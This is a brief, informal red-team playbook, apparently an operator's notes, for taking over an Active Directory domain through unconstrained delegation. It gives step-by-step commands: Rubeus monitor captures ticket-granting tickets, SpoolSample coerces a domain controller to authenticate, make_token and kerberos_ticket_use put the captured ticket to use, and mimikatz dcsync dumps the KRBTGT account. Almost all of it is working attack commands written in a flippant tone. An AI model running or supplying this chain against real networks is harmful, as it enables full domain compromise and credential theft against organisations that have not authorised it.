Set Rubeus Monitor Mode

Run Spool Sample thinga ma jiggy do get dem dc's to do stuff to things

Extract the mf tickets automagically

1. Compromise Server Configured with unconstrained delegation
2. Begin Monitoring for delegated TGT's with Rubeus Monitor /interval:5
3. Coerce domain controller to authenticate to the unconstrained server using spoolsample


1. execute-assembly /opt/exe/Rubeus.exe monitor /interval:5 /filteruser:DC_parent

2. execute-assembly /opt/exe/SpoolSample.exe DC_parent DC_child

3. Wait for Rubeus to give us ticket

4. Make sacrificial login token e.g., make_token domain.local\DC_parent$ test_user Password123!

5. Use kerberos ticket - kerberos_ticket_use /opt/tickets/ticket.kirbi

6. DCSYNC stuff mimikatz @lsadump::dcsync /user:parent.local\KRBTGT